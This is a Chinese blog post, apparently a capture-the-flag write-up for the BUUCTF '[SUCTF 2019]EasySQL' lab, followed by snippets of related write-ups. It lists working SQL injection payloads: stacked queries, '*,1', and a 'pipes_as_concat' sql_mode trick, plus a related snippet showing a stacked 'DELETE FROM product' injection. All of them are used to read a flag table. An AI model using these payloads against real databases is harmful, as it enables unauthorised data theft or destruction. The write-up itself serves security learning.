BUUCTF web-[SUCTF 2019]EasySQL

最新推荐文章于 2024-06-28 14:45:47 发布
最新推荐文章于 2024-06-28 14:45:47 发布
阅读量530 收藏 3
点赞数
分类专栏: BUUCTF web sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53314778/article/details/112723598
版权
web 同时被 3 个专栏收录
52 篇文章 0 订阅
订阅专栏
BUUCTF
46 篇文章 0 订阅
订阅专栏
sql注入
5 篇文章 0 订阅
订阅专栏
本文介绍了如何在遇到SQL注入问题时,通过改变||的逻辑作用来获取所需数据。作者分享了两种解题方法:一是利用数字1和*创建新列并查询;二是设置sql_mode为pipes_as_concat,使得||变为字符串拼接而非逻辑或。通过这些技巧,可以成功读取Flag表的内容,展示了SQL注入攻防中的知识和策略。
摘要由CSDN通过智能技术生成

[SUCTF 2019]EasySQL

在这里插入图片描述
输入 show tables# 爆表我们发现了Flag表
在这里插入图片描述1;show columns from Flag;# 查询Flag表的内容
在这里插入图片描述
不给我们查,应该是过滤了某些关键字。
我再试了试order by 联合联合查询,依然是返回NO,没辙,学习开始:

这题关键:要想办法让 ||不是逻辑或

解法一:

直接输入 **,1就可的flag

题解:

内置的sql语句为:
sql=“select”.post[‘query’]."||flag from Flag";

如果$post[‘query’]的数据为*,1,sql语句就变成了
select *,1||flag from Flag

select *,1 from Flag

也就是直接查询出了Flag表中的所有内容

ps:
通过大佬们的blog知道:
这道题目需要我们去对后端语句进行猜测

1、输入非零数字得到的回显1和输入其余字符得不到回显,来判断出内部的查询语句可能存在有||

2、进一步进行猜测即为select post进去的数据||flag from Flag(含有数据的表名,通过堆叠注入可知),需要注意的是,此时的||起到的作用是or的作用。

解法二:

输入的内容为:
1;set sql_mode=pipes_as_concat;select 1

题解:

我们执行的语句分别为:
select 1
set sql_mode=pipes_as_concat
select 1||flag from Flag

其中set sql_mode=pipes_as_concat;的作用为将||的作用由or变为拼接字符串
这个模式下进行查询的时候,使用字母连接会报错,使用数字连接才会查询出数据,因为这个 || 相当于是将 select 1 和 select flag from flag 的结果拼接在一起.
读出flag

知识点:

在这里插入图片描述select任何一个常数都会在表中新建一列,然后查询出那一列的内容

2.sql_mode:它定义了 MySQL 应支持的 SQL 语法,以及应该在数据上执行何种确认检查,其中的PIPES_AS_CONCAT将 ||视为字符串的连接操作符而非 “或” 运算符

无尽星河-深空
关注
专栏目录
BUUCTF——Web
2201_75331136的博客
07-11 1027
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
buuctf-web-[SUCTF 2019]EasySQL 1-wp
居上
06-22 1020
[SUCTF 2019]EasySQL 源码 网上找的源码 <?php session_start(); include_once "config.php"; $post = array(); $get = array(); global $MysqlLink; //GetPara(); $MysqlLink = mysqli_connect("localhost",$datauser,$datapass); if(!$MysqlL
BUUCTF--Web--[SUCTF 2019]EasySQL
weixin_44866139的博客
04-30 7859
猜测后端执行SQL语句 输入1,有回显 输入2,有回显,输入非零数字都有回显,输入字母无回显 输入1’,没回显,应该存在sql注入,猜测可能关闭了错误回显,报错注入可能行不通了 用order去试探有多少个字段,返回的都是Nonono,可能order by 参数被过滤了,联合查询就行不通了 排除了报错注入和联合查询注入,试下盲注,布尔盲注 1 and length(database())>=...
[BUUCTF从零单排] Web方向 02.Web入门篇之『常见的搜集』解题思路(dirsearch工具详解)
杨秀璋的专栏
06-28 1390
前文介绍了Web方向的基础题目——粗心的小李,考察的是git泄露文件知识。这篇文章同样是Web方向的题目——常见的搜集,该题目主要考察信息收集知识,为了方便大家思考,文章摘要部分尽量少提,大家也可以先尝试实践,再看WriteUp。基础性文章,希望对您有所帮助,尤其是对网络安全工具的使用和理解。
BUUCTFWebEasySQL
qq_70434663的博客
03-05 515
进入靶场后,
BUUCTF_Web_[SUCTF 2019]EasySQL
阿刁〇的博客
07-28 301
BUUCTF_Web_[SUCTF 2019]EasySQL 本关运用到的注入方法为堆叠注入,是个新的知识点,所以本关的wp以做笔记为主。 首先打开靶机 查看源码之后未发现有可利用信息 所以我们直接尝试注入 输入1,2均有回显,而输入a,b均无回显,可发现输入数字有回显,输入字母无回显 输入1'无回显,猜测可能存在注入,但关闭了错误回显 尝试了联合注入、布尔盲注、报错注入、时间注入后,回显均为Nonono,全部排除 查看他人博客后,发现本关运用了堆叠注入 堆叠注入 定义:*Stacked injecti
BUUCTF web EasySQL (sql_mode)
H4ppyD0g的博客
02-23 489
检查源码,就是一个post表单,赋值给query变量,然后提交。 既然题目说是sql题目,那就测试吧。 输入数字会显示1,输入字母没反应,输入双引号提示非法。这我就不会了,继续看wp 说是源码泄露在github https://github.com/team-su/SUCTF-2019/tree/master/Web/easy_sql 过滤了很多 "prepare|flag|unhex|xml|...
BUUCTF [SUCTF 2019]EasySQL
qq_42158602的博客
01-10 7535
打开界面 试了一下有三种显示 还有一个没有输出 可以堆叠注入 1;show databases; 1;show tables; 可以看到有一个Flag表 测试发现from flag都被过滤不能直接读到flag 想了很久想不到 看别人wp了~ 看见听说比赛的时候原理泄漏了的 select $_GET['query'] || flag from flag 是这样 md 谁想的到啊 别...
BUUCTF刷题记录[SUCTF 2019]EasySQL && [极客大挑战 2019]LoveSQL
weixin_44120469的博客
12-04 164
BUUCTF刷题记录 [SUCTF 2019]EasySQL && [极客大挑战 2019]LoveSQL [SUCTF 2019]EasySQL 这道题确实把我困住了 只有一个输入框,fuzz之后发现过滤了不少东西,显示Nonono 输入1之后显示 而且不管输入几都是这个界面 但是输入字母不是。 在这里我确实没有想到要去猜测后台查询字符的格式。 然而可以通过这里猜测到后台语句中有一个|| 1;show databases# 查询数据库信息 1;show table
BUUCTF--WEB
最新发布
书山有路勤为径,学海无涯苦作舟
06-28 1252
可以猜测,这个输入框是搜索当前数据库里的表id号应该,回显得数据就是表words里的两个字段id和data,但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显,说明有一个 或 结构,而且不直接回显flag,但作为一道题目,from一定是from flag。mb_substr($page,n,m):返回page中从第n位开始,到n+m位字符串的值。再跳转到新的页面什么也没有就结束了,所以在这个页面,我们请点击抓包,就能发现他的秘密。内联函数:将指定的函数体插入并取代每一处调用该函数的地方。
BUUCTF-WEB
ccfly1012的博客
11-02 3871
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF:Web-[极客大挑战 2019]EasySQL
wdnmddbl的博客
06-08 561
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)思路:文章很详细。
BUUCTF——[SUCTF2019]EasySQL
weixin_62248541的博客
11-28 408
BUUCTF——[SUCTF2019]EasySQL
buuctf [SUCTF 2019]EasySQL
qq_1873822的博客
03-02 386
#这里题目也是类似于[强网杯 2019]随便注 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM product
BUUCTF WEB EASYSQL
qq_41696858的博客
03-10 2534
sql注入题 看到login和register的双逻辑,本能反应往着二次注入里想,属于是条件反射了 现在register.php写个小脚本测试一下关键字 import requests import time sql_char = ['select', 'union', 'and', 'or', 'sleep', 'where', 'from', 'limit', 'group', 'by', 'like', 'prepare', 'a
Buuctf web [SUCTF 2019]EasySQL
m0_61903191的博客
09-13 1443
又是一道考察sql注入的题。
BUUCTF_WEBEasySQL1
qq_45766280的博客
05-07 437
先上图 先试试 无论输入什么数字都显示一样的结果 输入flag等特殊查询语句显示 其他的则不显示任何信息 尝试一下堆叠查询,输入: 1;show databases; 试了试联合查询,输出NONONO 查一下表 1; show tables; 好了明白了,flag应该就在当前表中,但所有有关Flag表的查询都被过滤掉了。 查看了别人的wp后才明白原理。 后端代码大致如下 select $_GET['query'] || flag from flag 在这个语句中起到过滤作用的是 || 这个的
BUUCTF-[SUCTF 2019]EasySQL1
09-12
BUUCTF-[SUCTF 2019]EasySQL1 是一个关于SQL注入的题目。根据引用和引用的内容,我们可以得知,原始的查询语句是 $sql = "select ".$_POST[query]."|| flag from Flag" ,在这个语句中,用户的输入被直接拼接到了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值